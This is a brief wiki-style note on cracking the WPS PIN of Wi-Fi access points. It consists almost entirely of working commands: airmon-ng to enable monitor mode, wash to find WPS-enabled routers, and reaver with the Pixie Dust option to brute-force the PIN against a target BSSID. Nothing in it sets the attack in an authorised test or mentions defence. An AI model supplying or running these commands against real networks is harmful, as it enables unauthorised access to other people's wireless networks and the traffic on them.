WPS is the 8-digit PIN that can be exploited:


Set the wlan0 in monitor mode

airmon-ng start wlan0

use wash to display the access points that have WPS feature
wash -i wlan0mon

then we are using reaver to brute-force the PIN
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -vvv -K


Unless otherwise stated, the content of this page is licensed under Creative Commons Attribution-ShareAlike 3.0 License